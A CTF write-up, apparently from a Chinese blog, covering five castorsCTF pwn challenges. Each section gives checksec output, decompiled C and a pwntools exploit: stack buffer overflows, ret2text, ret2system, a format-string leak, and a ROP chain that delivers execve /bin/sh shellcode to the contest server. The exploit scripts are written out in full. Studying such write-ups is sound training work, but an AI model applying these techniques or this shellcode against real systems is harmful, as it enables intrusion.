abcbof
Description:
nc chals20.cybercastors.com 14424
Solution:
程序保护如下:
Arch: amd64-64-little RELRO: Partial RELRO Stack: No canary found NX: NX enabled PIE: No PIE (0x400000)
main 函数如下:
int __cdecl main(int argc, const char **argv, const char **envp) { char v4; // [rsp+0h] [rbp-110h] char s2; // [rsp+100h] [rbp-10h] printf("Hello everyone, say your name: ", argv, envp); gets(&v4); if ( !strcmp("CyberCastors", &s2) ) get_flag(); puts("You lose!"); return 0; }
get_flag 函数如下:
void __noreturn get_flag() { char v0; // [rsp+7h] [rbp-9h] FILE *stream; // [rsp+8h] [rbp-8h] stream = fopen("flag.txt", "r"); if ( !stream ) exit(1); while ( 1 ) { v0 = fgetc(stream); if ( v0 == -1 ) break; putchar(v0); } fclose(stream); exit(0); }
解题思路:
覆盖变量漏洞
exp 如下:
#!/usr/bin/env python # -*- coding: utf-8 -*- from pwn import * debug = 1 context(arch='amd64', endian='el', os='linux') context.log_level = 'debug' if debug == 1: p = process(['./chall']) else: p = remote('chals20.cybercastors.com', 14424) pd = '\x00' * 0x100 pd += 'CyberCastors' p.sendlineafter('name: ', pd) p.interactive()
Flag:
castorsCTF{b0f_4r3_n0t_th4t_h4rd_or_4r3_th3y?}
babybof1
Description:
nc chals20.cybercastors.com 14425
Solution:
程序保护如下:
Arch: amd64-64-little RELRO: Partial RELRO Stack: No canary found NX: NX disabled PIE: No PIE (0x400000) RWX: Has RWX segments
main 函数如下:
int __cdecl main(int argc, const char **argv, const char **envp) { char v4; // [rsp+0h] [rbp-100h] puts("Welcome to the cybercastors Babybof"); printf("Say your name: ", argv); return gets(&v4); }
get_flag 函数如下:
void __noreturn get_flag() { char v0; // [rsp+7h] [rbp-9h] FILE *stream; // [rsp+8h] [rbp-8h] stream = fopen("flag.txt", "r"); if ( !stream ) exit(1); while ( 1 ) { v0 = fgetc(stream); if ( v0 == -1 ) break; putchar(v0); } fclose(stream); exit(0); }
解题思路:
ret2text 没啥说的
exp 如下:
#!/usr/bin/env python # -*- coding: utf-8 -*- from pwn import * debug = 1 context(arch='amd64', endian='el', os='linux') context.log_level = 'debug' if debug == 1: p = process(['./chall']) else: p = remote('chals20.cybercastors.com', 14425) elf = ELF('./chall', checksec=False) addr_get_flag = elf.sym['get_flag'] pd = '\x00' * 0x108 pd += p64(addr_get_flag) p.sendlineafter('name: ', pd) p.interactive()
Flag:
castorsCTF{th4t's_c00l_but_c4n_y0u_g3t_4_sh3ll_n0w?}
babybof2
Description:
nc chals20.cybercastors.com 14434
Solution:
程序保护如下:
Arch: i386-32-little RELRO: No RELRO Stack: No canary found NX: NX disabled PIE: No PIE (0x8048000) RWX: Has RWX segments
main 函数如下:
int __cdecl main(int argc, const char **argv, const char **envp) { puts("Do you really think you can get to the winners table?"); puts("I'll give you one shot at it, what floor is the table at: "); start(); puts("Yeah that's what I thougt, LOL.\n"); return 0; }
start 函数如下:
char *start() { char s; // [esp+0h] [ebp-48h] return gets(&s); }
winnersLevel 函数如下:
signed int __cdecl winnersLevel(int a1) { signed int result; // eax if ( a1 != 386 && a1 != 258 ) { puts("You guessed right but it seems your badge number isn't on our list."); result = 0; } else { puts("Wow! Please excuse me sir I had no idea...here are your chips"); system("cat ./flag.txt"); result = 1; } return result; }
解题思路:
直接 plt_system 加参数读取 flag 就完事
exp 如下:
#!/usr/bin/env python # -*- coding: utf-8 -*- from pwn import * debug = 1 context(arch='i386', endian='el', os='linux') context.log_level = 'debug' if debug == 1: p = process(['./chall']) else: p = remote('chals20.cybercastors.com', 14434) elf = ELF('./chall', checksec=False) plt_system = elf.plt['system'] addr_flag = 0x0804A046 # gdb.attach(p, "b *0x08049228\nc") pd = 'a' * 0x4c pd += p32(plt_system) pd += p32(0) pd += p32(addr_flag) p.sendline(pd) p.interactive()
Flag:
castorsCTF{b0F_s_4r3_V3rry_fuN_4m_l_r1ght}
babyfmt
Description:
nc chals20.cybercastors.com 14426
Solution:
程序保护如下:
Arch: amd64-64-little RELRO: Full RELRO Stack: Canary found NX: NX enabled PIE: PIE enabled
main 函数如下:
int __cdecl main(int argc, const char **argv, const char **envp) { FILE *stream; // [rsp+8h] [rbp-218h] char v5; // [rsp+10h] [rbp-210h] char s; // [rsp+110h] [rbp-110h] unsigned __int64 v7; // [rsp+218h] [rbp-8h] v7 = __readfsqword(0x28u); stream = fopen("flag.txt", "r"); if ( !stream ) exit(1); __isoc99_fscanf(stream, "%s", &v5); fclose(stream); printf("Hello everyone, this is babyfmt! say something: "); fgets(&s, 255, _bss_start); printf(&s, 255LL); return 0; }
解题思路:
不知道为啥远程还有 \r,本地和远程脚本反正不是很一样
这题拿 %lx 泄露字符串就行
exp 如下:
#!/usr/bin/env python # -*- coding: utf-8 -*- from pwn import * import binascii debug = 2 context(arch='i386', endian='el', os='linux') context.log_level = 'debug' if debug == 1: p = process(['./chall']) else: p = remote('chals20.cybercastors.com', 14426) pd = '' for i in range(8, 0x10): pd += '%' + str(i) + '$lx.tmp' p.sendline(pd) p.recvuntil('tmp\r\n') res = [] for i in range(0, 8): res.append(binascii.unhexlify(p.recvuntil('.tmp')[:-4].rjust(0x10, '0'))[::-1]) print ''.join(res) p.interactive()
Flag:
castorsCTF{l34k_l34k_th4t_f0rm4t_str1n6_l34k}
babybof1 pt2
Description:
nc chals20.cybercastors.com 14425
Solution:
程序保护如下:
Arch: amd64-64-little RELRO: Partial RELRO Stack: No canary found NX: NX disabled PIE: No PIE (0x400000) RWX: Has RWX segments
main 函数如下:
int __cdecl main(int argc, const char **argv, const char **envp) { char v4; // [rsp+0h] [rbp-100h] puts("Welcome to the cybercastors Babybof"); printf("Say your name: ", argv); return gets(&v4); }
get_flag 函数如下:
void __noreturn get_flag() { char v0; // [rsp+7h] [rbp-9h] FILE *stream; // [rsp+8h] [rbp-8h] stream = fopen("flag.txt", "r"); if ( !stream ) exit(1); while ( 1 ) { v0 = fgetc(stream); if ( v0 == -1 ) break; putchar(v0); } fclose(stream); exit(0); }
解题思路:
前面那个 flag 说你要尝试拿到 shell,那这道题的 get_flag 函数就没啥用了
ret2libc 好像一开始可以,后来主办方貌似禁了,用 ret2shellcode 也可
exp 如下:
#!/usr/bin/env python # -*- coding: utf-8 -*- from pwn import * debug = 2 context(arch='amd64', endian='el', os='linux') context.log_level = 'debug' if debug == 1: p = process(['./chall']) else: p = remote('chals20.cybercastors.com', 14425) elf = ELF('./chall', checksec=False) plt_gets = elf.plt['gets'] addr_bss = elf.bss() addr_rop1 = elf.search(asm("pop rdi;ret")).next() pd = '\x00' * 0x108 pd += p64(addr_rop1) pd += p64(addr_bss) pd += p64(plt_gets) pd += p64(addr_bss) # gdb.attach(p, "b *0x40078B\nc") p.sendlineafter('Babybof\r\n', pd) pd = "\x6a\x3b\x58\x99\x52\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x53\x54\x5f\x52\x57\x54\x5e\x0f\x05" p.sendline(pd) p.interactive()
Flag:
castorsCTF{w0w_U_jU5t_h4ck3d_th15!!1_c4ll_th3_c0p5!11}